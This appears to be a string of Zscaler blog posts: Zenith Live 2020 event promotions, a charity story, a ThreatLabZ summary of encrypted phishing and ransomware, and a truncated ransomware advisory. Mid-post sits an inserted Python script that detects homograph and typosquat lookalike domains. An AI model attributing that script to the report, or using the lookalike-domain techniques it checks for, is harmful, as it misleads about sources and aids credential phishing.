We asked Silver Peak to quickly answer a few questions about Silver Peak, Zscaler, and Zenith Live: What is it that Silver Peak does to help enterprises realize digital transformation goals? The Silver Peak Unity EdgeConnect SD-WAN edge platform enables enterprises to transform their WAN and security architectures by providing a thin edge with automated orchestration to cloud-delivered security services like Zscaler Internet Access (ZIA). Our Unity Orchestrator provides centralized WAN management in the cloud that is simple to deploy and agile in adapting to business needs. EdgeConnect is designed to deliver the highest multiplier from cloud and digital transformation investments while providing the highest quality of experience for application users. How does the partnership between Silver Peak and Zscaler contribute to an enterprise’s secure digital transformation journey? The Silver Peak EdgeConnect SD-WAN edge platform’s integration with the Zscaler Zero-trust Exchange allows enterprises to architect and deliver a secure access service edge (SASE) that assures users always have a fast, secure, and uninterrupted connection to business-critical applications. Branch office local internet breakouts are provisioned and secured in minutes, providing optimal performance to cloud applications and secure SD-WAN connectivity that automatically adapts to changing business requirements. For IT, that means lower costs and simplified operations. For the business, it means vastly increased productivity for end-users and uniform security enforcement for all branch locations across the enterprise. What presence will Silver Peak have at the Zenith Live conference? Cushman & Wakefield, a premier real estate firm with 400 locations in 60 countries, is a joint Silver Peak and Zscaler customer. 
In our Zenith Live session, learn how Silver Peak and Zscaler transformed Cushman & Wakefield’s network and enabled rapid network onboarding of acquired businesses to support its growth strategy. Don’t forget to check out the Silver Peak booth at the Zenith Live Partner Hall during the conference, and don’t miss their session A WAN Transformation Journey: Building an Enterprise-grade SASE with Silver Peak and Zscaler. On December 8-10, 2020, Zenith Live will bring together innovators leading their organizations’ secure digital transformation. This year’s summit features inspiring speakers and practical training for CxOs, IT execs, network architects, security managers, and business leaders who seek opportunity beyond limits. Register today: Amit Raikar Zenith Live 2020 Session Spotlight: “Securing Your IoT and OT Infrastructure” Operational technology (OT) and the data it generates are critical for enterprises seeking to maintain business continuity, improve efficiency, and accelerate progress. From powering cities, to slicing chocolate bars, to watering a remote orchard, to managing medical procedures, to lighting an assembly-line floor, OT systems deliver vital information to organizational leaders. But they are often vulnerable to a new type of security threat. OT is generating more data. Analysts are developing new ways to interpret it. Leaders are finding new ways to apply those learnings. And hackers are targeting new IoT attack vectors. Unfortunately, the vast majority of OT and IoT devices in the world remain unsecured, presenting significant threat risk to enterprise IT leaders. Combined with that, many organizations have little institutional awareness of all of their IoT/OT devices. (A recent Zscaler ThreatLabZ study notes the extent to which shadow IT initiatives have complicated IoT security.) Protecting valuable OT assets has never been more important. 
Addressing cybersecurity risk requires collaboration between OT and IT leadership, and goal alignment with business leaders. Protection begins with an enterprise audit of IoT/OT devices, followed by establishing secure, direct connectivity between those IoT/OT devices and data-traffic destinations. Few people recognize the importance of mitigating OT cybersecurity risk more than Anthony Atherton, Head of the Digitalization Enablement Center (DEC) at Siemens IT Strategy. Atherton has worked with Zscaler, his IT team, and business leaders across Siemens to develop and deploy comprehensive cybersecurity solutions for OT protection. The Zscaler Zero Trust Exchange secures more than one billion IoT transactions per month. Want to learn more about how Zscaler works with customers like Siemens to protect IoT/OT systems and data? Join Anthony and me at next month’s Zenith Live 2020, where we’ll co-present on this very topic. Our session “Securing Your IoT and OT Infrastructure” is scheduled for day two of the Americas, International, and Asia-Pacific editions of the premier global cloud event. This year, every seat’s in the front row as Zenith Live goes online and free. But space is limited! Register now.

Nathan Howe

Don’t Miss VMware at Zenith Live 2020

We’re looking forward to seeing you at Zenith Live 2020 Virtual Cloud Summit on December 8-10. Join fellow IT leaders and pioneers who are driving real secure digital transformation in their organizations and preparing for a mobile, multi-cloud future. The theme of Zscaler's third annual cloud conference is “Beyond Limits.” The partnership between VMware and Zscaler definitely takes SASE and zero trust beyond limits by helping enterprises to accelerate their SD-WAN transformation while delivering optimal application performance, agility, and security. VMware is a Zenith Live Platinum sponsor and will host a booth at the Partner Hall during the summit.
We asked VMware to quickly answer a few questions about its cloud-delivered SD-WAN, Zscaler, and Zenith Live:

How does VMware SD-WAN™ help enterprises realize digital transformation goals?

As cloud-delivered applications become commonplace and a dispersed workforce becomes the new normal, backhauling traffic over MPLS to a centralized data center via a hub-and-spoke architecture is as inefficient as it is irrelevant. This traditional approach introduces unnecessary complexity and latency that negatively impacts application performance and user experience. With a hyper-scale model of more than 3000 gateways strategically located in 130+ Points of Presence (PoPs) worldwide, VMware SD-WAN enables the closest, optimized handoff to application locations deployed in any cloud.

How does the partnership between VMware and Zscaler contribute to an enterprise’s digital transformation journey?

VMware SD-WAN with Zscaler Cloud Security delivers direct-to-cloud connectivity with secure and optimized local internet breakouts. Zero-touch provisioning enables rapid deployments of SD-WAN and security services. Flexible deployment options simplify branch IT operations while enabling scalability and centralized policy and WAN management. With Zscaler’s cloud-native security services, all users in all locations get identical protection. The seamless integration reduces complexity and aligns business and security policies to meet application needs and business objectives.

What presence will VMware have at the Zenith Live conference?

We have a speaking session with our joint customer, NCR Corporation. NCR will share insights on why they chose VMware and Zscaler for a secure cloud-delivered SD-WAN, along with the benefits they have derived from the joint solution. Join IT leaders driving the mobile- and cloud-first future December 8-10 at Zenith Live 2020, the Zscaler Virtual Cloud Summit.
Zenith Live 2020 offers insights, strategies, real-world examples, and best practices for accelerating your secure digital transformation. Don’t forget to check out VMware’s booth at the Zenith Live Partner Hall during the conference, and don’t miss their session NCR perspective: Deploying SASE with VMware and Zscaler. This year’s summit features inspiring speakers and practical training for CxOs, IT execs, network architects, security managers, and business leaders who seek secure digital transformation beyond limits. Register now:

Amit Raikar

Confidence and Collaboration Bring IT Career Success

This post originally appeared on LinkedIn. Zenith Live 2020 is almost here. This virtual summit will bring together network, cloud, and enterprise secure digital transformation pioneers and experts. On December 8, the event will be completely online, free, and focused on preparing your organization for a mobile- and cloud-first future. I’m particularly excited to announce the Women in Technology fireside chat. Women pioneers have transformed the information technology industry. But though representation has grown—by some estimates to 25%—there’s still far to go. Studies and books like The Confidence Code suggest that individual workplace success is conditioned on risk-taking, commitment, and resolute confidence when confronting opportunity. In this engaging roundtable session, former PepsiCo CIO Jody Davids, Hitachi CIO Jaya Ramaswamy, myself, and other notable IT industry leaders will discuss our experience in the C-suite, practical approaches for breaking down the barriers, and habits for transformative change.
We’ll look at:
Planning for a career in IT and cybersecurity
Real-world strategies for navigating different IT career progression tracks
Advocacy and professional development programs supporting women in IT careers
Diversity and collaboration as the secret ‘unlock’ for organizational change
Developing a support network by getting help and giving it
Instilling a growth mindset, developing personal confidence, and achieving work-life integration

Part of accelerating change is recognizing and celebrating pioneering female leaders who have transformed our industries for the better. The inclusive enterprise is egalitarian, agile, resilient, and effective. As IT leaders, we—all of us—must work to build environments that foster the success of the many. I am excited to join forces with these amazing leaders to celebrate our successes, acknowledge our challenges, and drive change across our organizations and the industry. Join me at this fireside chat, and join me to support the next generation of IT leaders.

Secure your spot

Zenith Live 2020 will be unlike any other virtual conference. As the premier event dedicated to secure digital transformation, you’ll have the opportunity to connect with Zscaler leaders, customers, partners, and your peers, and we’ll even have an astronaut on hand to talk about what it really means to go beyond limits. Registration is live, so don’t wait to reserve your spot. See you there!

Kavitha Mariappan

Up Close and Way Beyond: Captain Scott Kelly Headlines Zenith Live

Beyond limits isn’t just the theme of this year’s Zenith Live cloud summit; it’s an homage to the resources we’ve all summoned this year in the face of global, social, professional, and economic challenges—some enormous and distant, some right in front of us every day. From rethinking how we take care of ourselves and others to how we work and learn, each of us has had to dig deep for the reserves we’ve needed.
It hasn’t been easy, but we’ve managed to find the tenacity, resiliency, and, at times, scrappiness to reach farther than we thought possible. It’s only fitting that the U.S. Astronaut and former Navy Captain Scott Kelly will be at Zenith Live to share his thoughts on the indomitability of the human spirit, its ability to go beyond limits. I first saw Captain Scott Kelly at, of all places, a rock concert. In 2011, while living on the International Space Station (ISS), Kelly joined me (and 60,000 of my close friends) at a U2 concert. Beamed in live via satellite from space, Captain Kelly spoke to us directly on the big screen. He talked of unity, the notion of a one-world community, and "rising above all the nonsense." The veteran of four space flights and the American record holder for consecutive days spent in space, Captain Kelly has faced tests few people ever will, such as the extreme challenges of long-term spaceflight—its devastating effects on the body, the separation from loved ones, the pressures of close cohabitation, and the catastrophic risks of depressurization or colliding with space junk. In his keynote, Captain Kelly will share his remarkable trajectory from Navy fighter pilot to commander of the ISS. He’ll discuss the importance of leadership, teamwork, and embracing risk as a way to test your limits and achieve your full potential. A natural storyteller and bestselling author of Infinite Wonder, Endurance, and two books for young readers, we’re delighted that Captain Kelly will be at Zenith Live to share his unique insights into the infinite wonder of the galaxy and the strength of the human will. Scott Kelly is just one of the speakers we are thrilled to welcome to Zenith Live. There are many others who have led missions of their own, each with fascinating stories and unique perspectives on what it means to reach beyond limits—personally and professionally. 
Some of those speakers include:
Nicole Darden Ford, VP and CISO, Carrier
Mike Towers, CISO, Takeda Pharmaceuticals Company
Andy Greenberg, Technology Journalist & Author of ‘Sandworm’
Tony Gazikas, CIO IT Operations, Digital Product Security & Cybersecurity, Stanley Black & Decker, Inc.
Rob Franch, CTO, Cushman & Wakefield
Hanna Hennig, CIO, Siemens AG
John Maya, VP, Operational Excellence, Royal Caribbean Group
Jody Davids, Former SVP & Global CIO, PepsiCo
Jay Chaudhry, CEO, Chairman, and Founder, Zscaler

About Zenith Live 2020

Kicking off December 8, this year’s Zenith Live will be completely virtual and focused on preparing your organization for a secure digital future. For anyone driving digital transformation—network architects, security practitioners, CIOs and CISOs, and IT professionals at all levels—Zenith Live is the most important event you can attend this year. It offers informative sessions that can bolster you on your professional journey no matter where that may be. You can learn new skills or advance those you’ve already developed. You can engage with experts in areas of interest to you. You can meet with peers whose journeys are similar to your own. And you can hear from an astronaut who, just like you, knows a thing or two about going beyond limits. Secure your spot today

Dan Shelton

2020: The State of Encrypted Attacks

This blog is an overview of the latest threat research conducted by ThreatLabZ, Zscaler’s security research team. The full report is available here. While SSL/TLS encryption is the industry standard for protecting data in transit from prying eyes, encryption has, itself, become a threat. It is often leveraged by attackers to sneak malware past security tools that do not fully inspect encrypted traffic. As the percentage of traffic that is encrypted continues to grow, so do the opportunities for attackers to deliver threats through encrypted channels.
To better understand the use of encryption and the volume of encrypted traffic that is inspected, our research team, ThreatLabZ, analyzed encrypted traffic across the Zscaler cloud for the first nine months of 2020, assessing its use within specific industries. The study we conducted also set out to analyze the types of attacks that use encryption and the extent of the current risk. Our 2020 report shows that SSL-based threats remain prevalent and are becoming increasingly sophisticated. Our findings, some of which are highlighted below, show that traffic moving through encrypted channels can no longer be trusted simply by virtue of a digital certificate—the padlock icon on your browser does not guarantee security.

Attackers are preying on people’s trust in brands like Microsoft, Google, Netflix...

Our research showed that attackers have rapidly increased registration of malicious domains, which contributed to the 260 percent increase in SSL-encrypted threats in 2020 when compared to last year.

Figure: Netflix credential phishing site over HTTPS

Cybercriminals use “domain squatting” and “homograph attacks” to imitate popular, legitimate web pages with pixel-perfect replicas. Their ultimate goal is obvious: prey on the trust of big brands to deliver malware and steal login credentials (such as banking information) and other sensitive personal information. For example, links to registered domains along the lines of and could be clicked on by someone not paying close attention, and these sites can look nearly indistinguishable from the legitimate ones. And, as these domains leverage SSL/TLS encryption by default, they could easily bypass traditional security controls.

They abuse AWS, Google Drive, OneDrive, and Dropbox to deliver encrypted threats

Cloud-based file-sharing services are powerful tools for boosting employees’ collaboration and productivity. These services securely share files and information, with the SSL-encrypted content generally bypassing security controls.
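As an added example (not the ThreatLabZ report's code, and not a Zscaler product feature), here is a lookalike-domain check of the kind a mail gateway or URL filter could apply before trusting a padlocked HTTPS link: it folds a small, constructed subset of Unicode confusables to catch homographs, then flags brand names embedded in or within a short edit distance of the registrable label. The brand list, confusable table and sample domains are constructed for illustration, and the check deliberately ignores the Public Suffix List (it treats the label left of the TLD as the registrable one).

```python
import unicodedata
from urllib.parse import urlsplit

# Constructed brand list for the example; an organisation would maintain its own.
PROTECTED_BRANDS = ("microsoft", "google", "netflix", "dropbox")

# Constructed subset of Unicode confusables: Cyrillic and Greek letters that render
# like Latin ones. A production check would use the full Unicode confusables table.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",   # Cyrillic а е о р
    "\u0441": "c", "\u0445": "x", "\u0443": "y", "\u0456": "i",   # Cyrillic с х у і
    "\u03bf": "o", "\u03b1": "a", "\u03bd": "v", "\u03b9": "i",   # Greek ο α ν ι
}


def hostname_of(url: str) -> str:
    """Return the lowercased hostname of a URL (scheme-less input is tolerated)."""
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").rstrip(".").lower()


def decode_idna(host: str) -> str:
    """Turn punycode labels (xn--...) back into the Unicode the user actually sees."""
    try:
        return host.encode("ascii").decode("idna")
    except UnicodeError:
        return host  # already Unicode, or not valid punycode: compare as-is


def skeleton(label: str) -> str:
    """Reduce a label to an ASCII 'skeleton': fold confusables, then strip accents."""
    folded = "".join(CONFUSABLES.get(ch, ch) for ch in label)
    decomposed = unicodedata.normalize("NFKD", folded)
    return "".join(ch for ch in decomposed if not unicodedata.combining(ch))


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two short labels (typosquat detection)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess_url(url: str, brands=PROTECTED_BRANDS) -> dict:
    """Classify a link as 'legitimate', 'suspicious' or 'unrelated' for the brands.

    Only the hostname is examined; the TLS padlock is ignored on purpose because a
    valid certificate says nothing about whether the registrant is the brand.
    """
    host = decode_idna(hostname_of(url))
    labels = host.split(".")
    # Assumption for the example: no Public Suffix List, so the label left of the
    # TLD is the registrable one (www.netflix.com -> "netflix").
    registrable = labels[-2] if len(labels) >= 2 else labels[0]
    subdomains = labels[:-2]
    reg_skel = skeleton(registrable)
    reasons = []
    for brand in brands:
        if registrable == brand:
            return {"host": host, "verdict": "legitimate", "reasons": []}
        if reg_skel == brand:
            reasons.append(f"homograph of {brand}")
        elif brand in reg_skel:
            reasons.append(f"registrable label contains {brand} (squatting)")
        elif levenshtein(reg_skel, brand) <= 2:
            reasons.append(f"within edit distance 2 of {brand} (typosquatting)")
        if any(brand in skeleton(s) for s in subdomains):
            reasons.append(f"{brand} appears as a subdomain of another domain")
    if reasons and not host.isascii():
        reasons.append("hostname uses non-ASCII (IDN) characters")
    verdict = "suspicious" if reasons else "unrelated"
    return {"host": host, "verdict": verdict, "reasons": reasons}


if __name__ == "__main__":
    # Constructed sample links, including a Cyrillic-е homograph in punycode form.
    homograph = "n\u0435tflix.com".encode("idna").decode("ascii")
    for link in ("https://www.netflix.com/login", "https://" + homograph,
                 "https://netflix-account-verify.com/signin", "https://rnicrosoft.com",
                 "https://netflix.secure-login.net", "https://example.com"):
        print(link, "->", assess_url(link))
```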
While good for performance, bypassing security can open a backdoor into many enterprises. By the end of the analysis period, we found that malicious content delivered with encryption from file-sharing services represented 30 percent of all malicious SSL traffic.

Figure: Advanced threats blocked over TLS/SSL from top cloud storage services

Attacks can be initiated by creating file-sharing URLs to malicious content hosted in services like Google Drive or Dropbox as part of an email phishing campaign. This approach removes the need to attach infected files to emails, which users have been trained to treat with suspicion. Because the content is hosted on a legitimate file-sharing site, it comes with a level of trust—and infected users can quickly spread the attack by sharing the link across the organization.

Encrypted ransomware attacks continue to rise

Ransomware, malware that encrypts a host’s device or an organization’s data or network in exchange for a ransom payment, remains a significant threat. After successfully stealing and encrypting an organization’s data, today’s attackers may threaten to leak the data if no payment is made. Ransomware attacks delivered over SSL-encrypted channels are the next evolution of this highly destructive attack vector because encryption makes the attacks harder to detect. We saw a 500 percent increase in ransomware over encrypted channels between March and September 2020. Telecom companies and healthcare institutions have been hit the hardest because they tend to pay the ransoms due to the sensitive nature of their data. Ransomware families including FileCrypt/FileCoder variants, Sodinokibi, Maze, and Ryuk have been the most prevalent in our research.

Healthcare organizations bear the brunt of SSL-based attacks

Cybercriminals, showing no limits to their depravity, have increased their attacks on the healthcare sector during the pandemic using advanced threats over encrypted channels.
Our research found that healthcare was targeted by 25.5 percent of SSL-encrypted threats. While costly, threats hidden in encryption can have even more dire consequences, particularly when they affect the delivery of healthcare.

Figure: Advanced threats blocked over encrypted channels by industry

Protecting your organization against SSL threats

It’s important to recognize that SSL traffic is not necessarily secure traffic. Just as the use of encryption has increased, so has its use among adversaries to hide their attacks. The need to inspect encrypted traffic is greater than ever.
Decrypt, detect, and prevent threats in all SSL traffic with a proxy-based architecture and cloud-native performance.
Quarantine unknown attacks and stop patient-zero malware with AI-driven quarantine that holds suspicious content for analysis, unlike firewall-based passthrough approaches.
Provide consistent security for all users and all locations to ensure everyone has the same great security all the time, whether they are at home, at headquarters, or on the go.
Instantly reduce your attack surface by starting from a position of zero trust, where lateral movement can’t exist. Apps are invisible to attackers, and authorized users directly access needed resources, not the entire network.

To learn more about the evolving SSL threat landscape and what your organization can do to inspect all traffic and stay protected, download and review the full ThreatLabZ report.

Deepen Desai

Helping Changes You: Zscaler Employee Raises Funds for an Orphanage in Burkina Faso

Zscaler strongly believes in being a leader when it comes to giving back and helping others. And one of the great things about working at Zscaler is that it is filled with people who feel the same way and go out of their way to exhibit this philosophy. At the beginning of this year, Kadir Erol joined Zscaler as EMEA Director of Channel and Alliances, taking on the responsibility for expanding sales partnerships.
His new partner program promotes collaboration with VAR partners, enabling the company to support its customers through their secure digital transformation and to provide holistic advice on all aspects of the process. And that’s just his day job. When he’s not at work, Kadir dedicates his time and skills to Hummaid, an organization that he co-founded to support social aid projects. Kadir’s personal mission—at work and for the charity—is to work with others to achieve great things, and this is reflected in his latest achievement.

During a 200-hour, eight-day fundraising marathon, Kadir appealed to Zscaler employees around the world to raise money to build an orphanage in Burkina Faso. If that wasn’t enough, he (quite easily) convinced Zscaler to match every euro donated during this marathon. All of this was in an effort to raise 200,000 euros of initial capital needed for the orphanage project. In a little more than one week of fundraising, Hummaid made huge progress toward its goal. In July 2020, Zscaler employees donated 75,000 euros via the fundraising platform GoFundMe. After the corporate match, the total raised by the Zscaler family reached 150,000 euros. This GoFundMe campaign is ongoing, and private donations are continuing to come in, with the total now at 196,000 euros.

Kadir’s interest in social engagement and charitable activities was set in motion by his university friend Ali Altunay. In early 2018, Ali encouraged Kadir to donate money to help build a well in a village of 6,000 inhabitants in one of the most impoverished regions of Africa. Together they raised the money for this first project. After a while, something surprising happened. Kadir received an invitation to the official inauguration ceremony for the new well. This unexpected trip—and the insights it provided into life in Burkina Faso—had a lasting impact on Kadir. His feelings of gratitude that he was born in a more affluent part of the world began to manifest as a desire to help others.
Together with Ali, he founded Hummaid as an independent platform for further global projects aimed at providing support to those who need it most. The name of the organization comes from the words human, umma (a community of all people), and aid. Transparency is key to the way this registered charity works. The organization wants its donors or sponsors to see where their money is being spent. When donations are handed to recipients, such as 400 pairs of shoes for children in the Atlas Mountains or food packages for widows, the organization takes photos to share with the donors.

After Kadir and Ali visited an orphanage on their first trip to Burkina Faso, they quickly began to lay plans for their next major project. Shocked by the conditions in the region, the pair wanted to build their own orphanage. Architectural plans for the building, developed by Ali, came together quickly, and the organization obtained a plot of land via a local coordinator. Local builders submitted tenders for the construction of a property with living space and communal areas for 120 children, their caretakers, and teachers. The figures gave the pair an idea as to the amount they would need to raise. This month, Kadir and his colleagues will once again make the journey to Burkina Faso to watch the official groundbreaking ceremony for the orphanage in person.

“We were amazed at how willing employees were to respond to our appeal for donations,” said Kadir. “It doesn’t matter to us how much any individual donated; we are so thankful for every cent that brought us closer to making this project happen. For me, after my first trip to Africa, I knew that helping changes you.”

Kristi Myllenbeck

Zenith Live 2020 Speaker Profile: Markus Sontheimer, CIO/CDO, DB Schenker AG

Markus Sontheimer will speak on the main stage December 9 at the Zscaler annual cloud summit Zenith Live 2020.

Early investment in cloud transformation has paid (metaphorical) dividends for DB Schenker CIO/CDO Markus Sontheimer.
But like many of his IT peers, he never expected to have to roll out cloud services so fast. Sontheimer and his IT team manage systems and solutions infrastructure for the Essen, Germany-based global logistics company's 76,000 employees. Sontheimer describes the critical nature of DB Schenker's worldwide operations: "We have to cross borders. We have to ship from A to B, no matter what country it is, and no matter what it costs.”

Committing to the cloud

DB Schenker had begun its secure digital transformation in 2017, adopting Zscaler Internet Access as part of a broader shift to cloud-based solutions and SaaS. And then the pandemic struck, forcing Sontheimer to lead the most agile IT pivot in company history. Employees—all employees—would have to work remotely. Sontheimer and DB Schenker SVP of Global Infrastructure Services Gerold Nagel recognized immediately that corporate VPN technology couldn't scale to accommodate the added data volumes generated by an entirely remote workforce. "The disruption led us right away to ZPA [Zscaler Private Access]," notes Nagel.

Sontheimer and Nagel quickly deployed ZPA, first moving more than 8,000 employees in China to remote access. The encouraging success of that rapid transition led Sontheimer and Nagel to accelerate ZPA rollout to the rest of the company and preserve business continuity.

Hear the rest of the story directly from DB Schenker CIO/CDO Markus Sontheimer when he speaks on the main stage at Zenith Live 2020. This year, the world’s premier cloud summit goes virtual and free December 8-10. You’ll get the opportunity to engage with Markus Sontheimer and IT leaders from Unilever, Sandvik, Siemens, Testco, and many more.

DB Schenker’s secure digital transformation journey is chronicled in the book Securing Remote Work - Safeguarding Business Continuity with Zscaler, from which a portion of this article is excerpted.
Toph Whitmore is a transformation analyst at Zscaler.

Toph Whitmore

Microsoft and Zscaler Bring Zero Trust to Zenith Live

The Zenith Live Virtual Cloud Summit 2020 brings together the best experts and brightest minds in security, cloud, and enterprise secure digital transformation. Kicking off December 8, this year’s event is completely virtual, free, and focused on preparing your organization for a mobile, cloud-first future.

Zenith Live showcases Zscaler partnerships with other digital transformation leaders. One such leader is Microsoft, a Zscaler partner that works to bring better identity, visibility, and application performance to enterprise security strategies. Both companies leverage each other’s technologies to help enterprises better prepare for the cloud- and mobile-first world:

Zscaler and Azure Active Directory (Azure AD). Identity is essential to enterprise security. Zscaler and Azure AD integrate (using SAML, SSO, and SCIM 2.0) to provide secure and seamless access to all your applications. Microsoft provides identity management and, together with Zscaler, provides access controls via policy management. Secure access to legacy applications with a Zero Trust approach is the greatest benefit from the partnership—a crucial advantage for large enterprises that often have hundreds (sometimes thousands) of critical legacy applications.

Zscaler and Azure Sentinel. A Zscaler connector in the Azure Sentinel console allows companies to connect ZIA logs with Azure Sentinel and view dashboards, create custom alerts, and improve investigation. By ingesting hundreds of millions (or billions) of internet transactions and threat logs, Azure Sentinel can draw significantly more powerful correlations and machine learning analyses from traffic generated by employees at large organizations.

Zscaler and Microsoft 365. Many enterprise customers backhaul traffic to a few internet breakouts for security inspection using a hub-and-spoke network architecture.
Zscaler’s ZIA enables local breakouts at virtually every branch office, which directly improves Microsoft 365 application performance. Zscaler’s ZIA is a qualified Microsoft 365 Networking Partner Program solution.

Zscaler and Azure Information Protection (AIP). The integration of Zscaler DLP and AIP allows Zscaler to enforce actions based on document classifiers and labels defined by AIP. Zscaler's built-in file decoding capability detects AIP's labels, then takes appropriate actions based on Zscaler's DLP policy. This even works for encrypted files.

Sessions at Zenith Live 2020 will demonstrate how Zscaler and Microsoft work together to move enterprises through their transformation journey:

Keynote session with Alex Simons, Corporate Vice President of Program Management, on Zero Trust and enterprise security. “A Zero Trust approach is the only way to secure your entire digital estate” is the message from Alex Simons in his Zenith Live keynote. Listen to Alex discuss how the partnership between Microsoft and Zscaler helps establish user identity and secure corporate assets so that enterprises can rapidly and agilely adapt to changing needs (like the recent work-from-home initiatives many organizations are adopting).

Microsoft and Zscaler – How the Enterprise Deploys Work-from-Anywhere in the New Normal. Six months ago, the global pandemic left IT teams scrambling to support millions of employees suddenly working from home. Yet, many teams still rely on the same legacy technologies of the past and struggle to scale and deliver a fast user experience. Their VPN appliances slow them down and are exploited due to outdated security postures. Join us to learn how Sanofi, in its pursuit of a zero trust, future-ready cloud solution, leveraged Microsoft Azure Active Directory and Zscaler Private Access. As a result, the company was prepared to enable work-from-anywhere securely when the COVID-19 lockdown was implemented across much of the world.
Microsoft and Zscaler – Microsoft 365 Best Practices. The Zscaler Zero Trust Exchange works seamlessly with Microsoft 365, providing traffic identification, local network egress, and direct routing, features that serve to optimize Microsoft 365 performance for enterprise users. In this session, Zscaler senior program manager Paul Collinge and director of product management Naresh Kumar join Coca-Cola Consolidated director of the infrastructure center of service Rory Regan to share best practices, lessons learned, and practical real-world advice for deploying Microsoft 365.

Secure your spot

Zenith Live 2020 will be unlike any other virtual conference. As the premier event dedicated to secure digital transformation, you’ll have the opportunity to connect with Zscaler leaders, customers, partners, and your peers, and we’ll even have an astronaut on hand to talk about what it really means to go beyond limits. Registration is live, so don’t wait to reserve your spot. See you there!

Luis Mendoza is senior director of business development at Zscaler.

Luis Mendoza

Zenith Live Will Accelerate Your Digital Transformation Journey

Zenith Live 2020, the Zscaler Annual Cloud Summit, will bring together the best experts and brightest minds in security, cloud, and enterprise digital transformation. Kicking off December 8, this year’s event will be completely virtual, free, and focused on preparing your organization for a mobile, cloud-first future.

For security and network professionals, IT leaders, and those driving digital transformation initiatives, Zenith Live is the most important event you can attend this year. It offers you a unique opportunity to interact with industry experts and find out how they:

Replaced legacy architectures and created agile networks.
Used IT to enable business growth beyond the limits of legacy thinking.
Led their organizations’ secure digital transformation.
Zenith Live boasts hands-on architecture workshops, ask-the-expert sessions, and comprehensive training that can help you realize your vision, empower your organization, and accelerate your digital future with sessions, including:

Voice of the Customer Keynotes. Listen to innovation leaders from companies like Johnson Controls, Cushman & Wakefield, and Takeda Pharmaceuticals discuss their success in transforming their organizations for a more agile and secure digital future.
Architecture Workshops. Zscaler expert architects share their experience leading network, security, and data center application transformations while reinventing safe connections in the cloud- and mobile-first era.
Ask-the-Expert Sessions. Zscaler experts lead interactive sessions on how SASE and zero trust architectures can accelerate your secure digital transformation, with practical steps and proven best practices for successful outcomes.
CXO Perspectives Panels. Hear how CIO, CTO, and CISO pioneers from Fortune 500 companies successfully enacted secure digital transformation, overcoming cultural and technological issues.

Training tracks

Zenith Live includes training tracks that will make you an expert at deploying zero trust and SASE to solve your business challenges.

Network Transformation Essentials and Masters training. Learn cloud firewall configuration, Zscaler Client Connector deployment, SD-WAN implementation, Zscaler Digital Experience user experience visualization, and more.
Security Transformation Essentials and Masters training. Find out how to better use cloud sandboxing, data loss prevention (DLP), endpoint protection, and cloud access security broker (CASB) to improve your enterprise security posture.
ZPA Essentials and Masters training. Discover how to get Zscaler Private Access (ZPA) up and running, configure advanced policy controls, manage application discovery, and troubleshoot issues.

Secure your spot

Zenith Live 2020 will be unlike any other virtual conference.
As the premier event dedicated to secure digital transformation, you’ll have the opportunity to connect with Zscaler leaders, customers, partners, and your peers, and we’ll even have an astronaut on hand to talk about what it really means to go beyond limits. Pre-registration is live, so don’t wait to reserve your spot. See you there!

David Avery is a transformation strategist at Zscaler.

David Avery

Zenith Live 2020 Speaker Profile: Andy Greenberg, author of Sandworm

Wired Magazine journalist and acclaimed author Andy Greenberg will deliver the day-two keynote at the Zscaler annual cloud summit Zenith Live 2020.

"On June 27, 2017, something strange and terrible began to ripple out across the infrastructure of the world." So begins the introduction to Andy Greenberg's book Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers. With more than a little understatement, Greenberg introduces us to NotPetya, the destructive, self-spreading malware that would soon make its presence known (very well-known) across the globe.

In Sandworm, Greenberg deconstructs the NotPetya attack, detailing how it struck high-profile companies in pharmaceuticals, shipping, logistics, healthcare, and so many other industries. NotPetya represented a new type of malware, a ransomware variant that purported to take its data hostage, but instead — once released inside a breached network — splintered to move freely “east/west,” eradicating any data on any system accessible from within the victim organization’s security perimeter. In the 2017 round of attacks, NotPetya ultimately caused its corporate victims a whopping US$10 billion in damages.
NotPetya was the work of a Russian state-sponsored cybercriminal organization dubbed “Sandworm.” The devastating NotPetya attacks followed on the heels of the group’s prior criminal activities, including a catastrophic assault on Ukraine's power infrastructure, and a near-successful attempt to sabotage the 2018 Winter Olympics. Investigative journalist Andy Greenberg documented the Sandworm story for Wired Magazine, and has expanded his research into Sandworm’s provenance, approach, and activities for his new book.

It’s easy to characterize the 2017 NotPetya deployment as the most devastating malware attack in history. But it was much more than that: It was a novel criminal act, a new malware variant dispassionately pursuing utter annihilation, and the achievement of a new standard in the exercise of punitive force by a state-sponsored international cyber-terrorist group.

Despite the sweeping destruction of NotPetya, despite the massive financial impact, despite the immeasurable loss of unrecoverable digital assets, the 2017 NotPetya assault was ultimately thwarted by the tireless work of enterprise IT leaders, many of whom went to extreme lengths to block and respond to the attack. In their exemplary efforts lies a powerful story of preparedness, recovery, and resilience. And a compelling, constructive, even optimistic message: Ransomware doesn’t have to be an inevitability.

Hear more of the Sandworm story directly from Andy Greenberg when he speaks on the main stage on day two of Zenith Live 2020. This year, the world’s premier cloud summit goes virtual and free December 8-10. You’ll get the opportunity to engage with industry experts like Andy, cloud-security experts, and IT leaders like yourself pursuing secure digital transformation.
Register now at

Toph Whitmore

Coverage Advisory for Ransomware Activity Targeting Healthcare and Public Health Sector

Background

A joint cybersecurity advisory was released by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS) related to an increased cybercrime threat to U.S. hospitals and healthcare providers from ransomware, notably Ryuk and Conti.

What is the issue?

CISA, FBI, and HHS have credible information of an increased and imminent cybercrime threat to U.S. hospitals and healthcare providers from ransomware like Ryuk and Conti. These ransomware families have been deployed by malware belonging to the TrickBot and BazarLoader/BazarBackdoor families. Cybercriminals disseminate TrickBot and BazarLoader via phishing campaigns that contain either links to malicious websites that host the malware or attachments carrying the malware. The loaders start the infection chain by delivering the payload: they retrieve the backdoor from the C2 server, install it on the victim’s machine, and execute it. A TrickBot or BazarLoader infection can lead to the deployment of ransomware such as Ryuk and Conti.

What systems are impacted?

All machines running the Windows operating system.

What can you do to protect yourself?

